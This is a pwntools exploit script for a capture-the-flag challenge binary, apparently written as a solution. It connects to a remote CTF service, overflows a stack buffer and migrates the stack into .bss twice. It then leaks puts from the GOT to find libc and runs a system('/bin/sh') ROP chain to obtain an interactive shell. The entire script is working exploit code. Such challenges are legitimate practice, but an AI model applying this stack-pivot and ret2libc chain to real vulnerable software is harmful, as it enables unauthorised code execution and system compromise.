# CTF exploit script (pwntools) for the "pwn" challenge binary: two rounds of
# stack migration into .bss, a puts@GOT leak to locate libc, then a
# system("/bin/sh") ROP chain. Flat script; the send/recv order matters.
from pwn import *
# Target is a 64-bit Linux binary; debug log level prints every byte sent/received.
context(arch='amd64', os='linux', log_level='debug')
elf=ELF("./pwn")
# Hard-coded local copy of the remote libc (2.35-0ubuntu3.11); used only for symbol offsets.
libc=ELF("/home/eva/Desktop/glibc-all-in-one/libs/2.35-0ubuntu3.11_amd64/libc.so.6")
# Local process alternative, left disabled; the script currently talks to the remote instance.
#p=process("./pwn")
p=remote("nc1.ctfplus.cn",45020)
# Absolute addresses from the challenge binary (presumably non-PIE, since they are
# not rebased anywhere below — confirm against the binary).
leave_ret=0x4011c8      # leave; ret gadget, used for the pivot
pop_rdi_ret=0x401146    # pop rdi; ret gadget
ret=0x401016            # bare ret gadget
read_addr=0x40119E      # re-entry point inside main (presumably just before its read() — confirm)
main_addr=0x40114B      # main, returned to after the leak
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
bss_addr=elf.bss()
# Two scratch regions inside .bss that serve as the fake stacks for each pivot.
new_stack1=bss_addr+0x500
new_stack2=bss_addr+0x800
# Round 1: 0x80 bytes of filler, then new_stack1 and read_addr. The layout implies
# these land in the saved rbp slot and the return address respectively — confirm
# against the binary's frame layout.
payload1 = b'a'*0x80
payload1 += p64(new_stack1)
payload1 += p64(read_addr)
p.recvuntil(b"migrate?\n")
p.send(payload1)
# ROP chain written by the re-entered read(): leak puts's real address via
# puts(puts_got), then go back to main for a second round.
rop1 = flat(
new_stack1,
pop_rdi_ret,
puts_got,
puts_plt,
main_addr
)
# Pad the chain to 0x80 bytes, then append the fake saved rbp (new_stack1-0x80)
# and leave_ret so the pivot lands rsp on the chain.
rop1 = rop1.ljust(0x80,b'\x00')
rop1 += p64(new_stack1-0x80)
rop1 += p64(leave_ret)
p.send(rop1)
# Two "Good luck." banners are consumed before the leak; presumably the binary
# prints the banner once per pass through main — verify against the binary's output.
p.recvuntil(b"Good luck.\n")
p.recvuntil(b"Good luck.\n")
# The leaked pointer is 6 significant little-endian bytes; zero-extend to 8.
# NOTE(review): recv(6) may return fewer than 6 bytes on a short read; recvn(6)
# would block for exactly 6.
puts_addr = u64(p.recv(6).ljust(8,b'\x00'))
log.info(f"puts_real_addr: {hex(puts_addr)}")
# Rebase libc from the leak and resolve system and a "/bin/sh" string.
libc_base=puts_addr-libc.sym["puts"]
system_addr=libc_base+libc.sym["system"]
bin_sh_addr=libc_base+next(libc.search(b"/bin/sh"))
log.info(f"libc_base: {hex(libc_base)}")
log.info(f"system_addr: {hex(system_addr)}")
log.info(f"bin_sh_addr: {hex(bin_sh_addr)}")
# Round 2: same overflow shape, this time pivoting to new_stack2.
payload2 = b'A'*0x80
payload2 += p64(new_stack2)
payload2 += p64(read_addr)
p.recvuntil(b"migrate?\n")
p.send(payload2)
# Final chain: system("/bin/sh"). The extra `ret` is presumably there for
# 16-byte stack alignment before the call into system — confirm.
rop2 = flat(
new_stack2,
ret,
pop_rdi_ret,
bin_sh_addr,
system_addr
)
# Same pad-then-pivot layout as round 1.
rop2 = rop2.ljust(0x80, b'\x00')
rop2 += p64(new_stack2 - 0x80)
rop2 += p64(leave_ret)
p.send(rop2)
# Hand the connection to the user.
p.interactive()